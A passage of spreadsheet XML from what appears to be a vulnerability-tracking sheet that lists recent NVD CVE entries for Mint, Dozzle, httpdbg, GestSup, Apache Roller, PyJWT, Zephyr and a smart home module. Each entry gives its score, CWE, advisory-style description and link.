          <t>Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in elixir-mint mint allows a malicious HTTP/1 server to desynchronize an intermediary and the Mint client on a pooled connection, poisoning the responses to subsequent requests that share the connection.
message_body/1 in lib/mint/http1.ex selects chunked framing when chunked is the first coding listed in a response's Transfer-Encoding fields. RFC 9112 section 6.3 applies chunked framing only when chunked is the final coding, and otherwise reads the body until the server closes the connection. For a response such as Transfer-Encoding: chunked, gzip, an intermediary that follows the RFC treats every byte up to the close as the body, while Mint ends the body at the zero-length chunk and parses the remaining bytes as the response to the next request on the connection.
Mint also keeps the connection open after an HTTP/1.0 response, final or 1xx, that carries Transfer-Encoding and Connection: keep-alive. RFC 9112 section 6.1 requires treating the framing of such a message as faulty and closing the connection after it, so bytes after its chunked body are parsed as the response to the next request in the same way.
This issue affects mint: from 0.1.0 before 1.11.0.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94194</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102332</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>Dozzle versions before 11.1.2 fail to sanitize container display names when building ZIP archive entry names in the log download endpoint. Attackers who can label containers can use path traversal sequences to write files outside the extraction directory when users download and extract logs.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102332</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102333</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>httpdbg before 2.2.1 fails to validate URL schemes in recorded HTTP request URLs rendered as clickable links in the web interface. Attackers controlling traffic recorded by httpdbg can supply javascript: scheme URLs that execute malicious scripts in the application origin when clicked, allowing access to captured request and response data including headers and tokens.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102333</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102372</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.62 fail to properly sanitize HTML email bodies in the IMAP LOGIN connector, allowing unauthenticated attackers to store arbitrary JavaScript in ticket descriptions and replies. Attackers can send emails to the monitored mailbox containing script tags and event handlers that execute in technician browsers, enabling ticket data theft and unauthorized actions.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102372</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102374</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.62 contain a stored cross-site scripting vulnerability in the IMAP OAuth connector that double-decodes MIME-encoded email subjects after HTML escaping. Unauthenticated attackers can send crafted emails to monitored mailboxes with nested MIME encoded-words to inject JavaScript that executes in technician sessions when viewing tickets.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102374</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82382</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows a remote attacker to perform reflected cross-site scripting against a visitor to a weblog using the bundled frontpage theme, by supplying a crafted blog-directory parameter that the directory page reflects without proper escaping. This affects only weblogs that use the bundled frontpage theme, and a victim must follow a crafted link for the script to execute. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which validates and contextually escapes the reflected parameter.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82382</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82546</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows an unauthenticated remote attacker to store a crafted comment-author URL through the incoming Trackback endpoint when a published entry accepts comments and Trackbacks. The shipped Trackback, verification and moderation defaults allow the value to be approved and rendered as an active link; a visitor who clicks the link executes script in the weblog's origin. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes incoming Trackback support and suppresses non-HTTP(S) comment-author links. Users unable to upgrade should disable Trackbacks and remove untrusted Trackback comments.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82546</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86507</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input in Apache Roller 6.1.5 allows an anonymous remote attacker to store a crafted comment-author URL that can execute script in the session of a weblog moderator or global administrator when the comment management page is viewed. This affects sites that permit comments on at least one weblog and whose moderator subsequently reviews the submitted comment; no non-default server setting is required. Users are recommended to upgrade to Apache Roller 6.1.6 or later.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86507</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87752</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Rolantis Information Technologies Tourism Industry and Trade Co. Ltd. Agentis allows XSS Targeting HTML Attributes.
This issue affects Agentis: from 4.44 before 4.6.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87752</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91204</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows an anonymous remote attacker to store a comment containing a javascript: URI link that survives HTML comment formatting and can execute script in the browser of a visitor who clicks it. This affects only sites that enable HTML in comments (users.comments.htmlenabled=true) together with the HTMLSubset comment formatter; comment moderation, where enabled, delays publication. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which restricts restored links to http, https and mailto URIs.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91204</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91206</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows a remote attacker to perform reflected cross-site scripting through the optional LDAP comment authenticator, which writes request parameter values into its HTML form without escaping. This affects only sites configured to use LdapCommentAuthenticator, and a victim whose session has already loaded the authenticator form must follow a crafted link. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which escapes the reflected values.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91206</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82933</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr"/>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module sends its web interface and API traffic over unencrypted HTTP. Passwords, authentication tokens, and device commands are transmitted in cleartext. An attacker on the same network can intercept this traffic, steal credentials and tokens, and hijack sessions.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82933</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102274</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>python, go</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.9.0 until 2.14.0, PyJWKSet does not catch the plain ValueError raised for malformed RSA JWK components by RSAAlgorithm.from_jwk in  jwt/api_jwk.py. This occurs when a JWK Set contains a malformed RSA key alongside otherwise usable keys. As a result, one malformed member aborts construction of the entire PyJWKSet. Consequently, applications can experience authentication failures or request-level denial of service. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102274</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18746</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>requests, rust</t>
        </is>
      </c>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>parse_write_op() in subsys/net/lib/lwm2m/lwm2m_message_handling.c handles inbound CoAP WRITE/CREATE requests that carry a Block1 option. For the first block of a transfer it called init_block_ctx() and then immediately stored the peer-selected block size with block_ctx-&gt;ctx.block_size = block_size before inspecting the return code. init_block_ctx() sets the caller's pointer to NULL and returns -ENOMEM when no entry of the static block1_contexts[] pool is free or timed out, so that store dereferences a NULL pointer.
The pool holds CONFIG_LWM2M_NUM_BLOCK1_CONTEXT entries (default 3) and an entry is only reclaimed once its transfer completes, fails, or ages past 30 seconds. A peer that reaches the client's LwM2M socket can therefore start three block-wise writes on three distinct object paths with the CoAP More bit set and leave them incomplete, then send the first block of a fourth write on a new path to reach the unguarded dereference. Reachability is gated only by the connected UDP socket's source-address filter unless CONFIG_LWM2M_DTLS_SUPPORT is enabled — which has no default — so in a NoSec deployment an on-path or address-spoofing attacker needs no credentials; the same sequence is also reachable from a bootstrap or lower-trust server, and can be hit accidentally by a legitimate server running four concurrent block transfers.
The write targets a fixed low address with a value between 0 and 7, so the consequence is a fatal memory fault (BusFault or corrupted low memory leading to a fault) rather than a usable memory-corruption primitive: the device crashes or resets. Confidentiality and integrity are not affected. The fix moves the store below the guard and validates the context pointer itself instead of the return code, so the context is only touched once it is known to be valid.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18746</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82936</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module is vulnerable to Denial of Service due to uncontrolled resource consumption. The Express bodyParser is configured with a 250 MB limit for JSON and URL-encoded request bodies. An authenticated attacker on the LAN can send large request bodies that exhausts buffers in RAM, causing out-of-memory conditions and crashing the fh-node process, resulting in denial of service. The successful attack depends on the current memory usage of the device which is not under full control of the attacker. Critically, due to CVE-2026-82930 all endpoints can be queried unauthenticated, so any user on LAN can perform this attack.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82936</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87798</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
